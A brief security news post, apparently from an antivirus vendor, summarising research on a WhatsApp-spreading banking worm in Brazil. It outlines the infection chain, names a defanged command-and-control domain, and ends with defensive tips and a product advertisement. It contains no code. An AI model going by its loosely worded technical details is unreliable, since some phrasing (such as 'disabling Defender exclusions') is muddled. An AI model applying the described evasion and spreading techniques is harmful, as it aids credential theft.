Cyber threat infographic: WhatsApp chat with malicious ZIP exploding into worm icons spreading to contacts, Selenium browser hijack and Maverick trojan stealing bank data; Brazil map with 400+ infection pins, protective antivirus shield, "Stop the Spread"

Sophos analysts have uncovered Maverick Menace, a sophisticated self-propagating worm exploiting WhatsApp to attack Brazilian financial institutions and crypto exchanges. Launched September 29, 2025, it has infected over 400 customer environments and 1,000+ endpoints. The campaign uses social engineering: compromised contacts send ZIP archives claiming content is "desktop-only," tricking users into executing a malicious LNK file that runs Base64-encoded PowerShell to fetch payloads from C2 servers like zapgrande[.]com.

Cyber threat infographic: WhatsApp chat with malicious ZIP exploding into worm icons spreading to contacts, Selenium browser hijack and Maverick trojan stealing bank data; Brazil map with 400+ infection pins, protective antivirus shield, "Stop the Spread"Cyber threat infographic: WhatsApp chat with malicious ZIP exploding into worm icons spreading to contacts, Selenium browser hijack and Maverick trojan stealing bank data; Brazil map with 400+ infection pins, protective antivirus shield, "Stop the Spread"

The multi-stage infection evades defenses by disabling Microsoft Defender exclusions and UAC via obfuscated scripts. A first-stage Explorer process downloads the core malware, establishing persistence. This creates a permissive environment for long-term access, bypassing modern security on desktops rather than mobiles.

Cyber threat infographic: WhatsApp chat with malicious ZIP exploding into worm icons spreading to contacts, Selenium browser hijack and Maverick trojan stealing bank data; Brazil map with 400+ infection pins, protective antivirus shield, "Stop the Spread"Cyber threat infographic: WhatsApp chat with malicious ZIP exploding into worm icons spreading to contacts, Selenium browser hijack and Maverick trojan stealing bank data; Brazil map with 400+ infection pins, protective antivirus shield, "Stop the Spread"

The dual payloads amplify damage:

Selenium automates browser control to hijack WhatsApp Web sessions, auto-spreading to contacts; the Maverick trojan monitors traffic for bank/crypto sites, injecting .NET malware to steal credentials and siphon funds. This advanced tactic highlights cybercriminals' Windows and banking expertise—users should verify attachments, enable 2FA, and use antivirus with behavioral detection to counter it.


NPAV offers a robust solution to combat cyber fraud. Protect yourself with our top-tier security product, FraudProtector.net